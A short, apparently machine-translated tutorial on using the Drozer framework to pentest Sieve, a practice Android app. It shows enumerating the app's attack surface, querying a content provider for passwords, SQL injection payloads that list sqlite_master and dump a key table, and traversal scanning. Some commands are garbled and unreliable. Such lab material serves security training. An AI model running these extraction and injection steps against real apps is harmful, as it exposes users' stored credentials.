Use Drozer for Android penetration testing

First, install and start 1.installation 

First step: Download Drozer from Http://mwr.to/drozer (Windows Installer)

Step Two: install agent.apk on your Android device

ADB install agent.apk

2.Start

First step: use adb on the PC for port forwarding and forwarding to the port used by Drozer 31415

ADB forward TCP:31415 tcp:31415

Step two: Turn on the Drozer Agent on your Android device

Select Embedded Server-enable

Step three: open The Drozer console on the PC

Second, the test steps

1. Get the package name

Dz> Run App.package.list-f sievecom.mwr.example.sieve

2. Get basic information about your app

Run App.package.info-a Com.mwr.example.sieve

3. Identify the attack surface

Run App.package.attacksurface Com.mwr.example.sieve

4.Activity

(1) get activity Information

Run App.activity.info-a Com.mwr.example.sieve

(2) Activate activity

Run App.activity.start--component Com.mwr.example.sievedz> Help app.activity.startusage:run App.activity.start [-h] [--action action] [--category category][--component package component] [--data- URI Data_uri] [--extra TYPE KEY VALUE] [--Flagsflags [flags ...]] [--mimetype MimeType]

5.Content Provider

(1) get content Provider information

Run App.provider.info-a Com.mwr.example.sieve

(2) Content Providers(data leakage)

Get all the URIsyou can access first:

Run Scanner.provider.finduris-a Com.mwr.example.sieve

Get the data for each Uri :

Run App.provider.querycontent: // com.mwr.example.sieve.dbcontentprovider/passwords/--vertical

A vulnerability exists in the query to the data description

(3) Content Providers(SQL injection)

Run App.provider.query content: // com.mwr.example.sieve.dbcontentprovider/passwords/--projection "'" Run App.provider.query content: // com.mwr.example.sieve.dbcontentprovider/passwords/--selection "'"

An error indicates that there is a SQL injection.

List all tables:

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* From Sqlite_master WHERE type= ' table ';--"

Getthe data in a table (such as Key):

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* From key;--"

(4) Simultaneous detection of SQL injection and directory traversal

Run Scanner.provider.injection-a Com.mwr.example.sieve

6.Service

(1) Get service details

Run App.service.info-a Com.mwr.example.sieve

7. Other Modules

/tools.file.download Upload//TOOLS.SETUP.MINIMALSU Install available binaries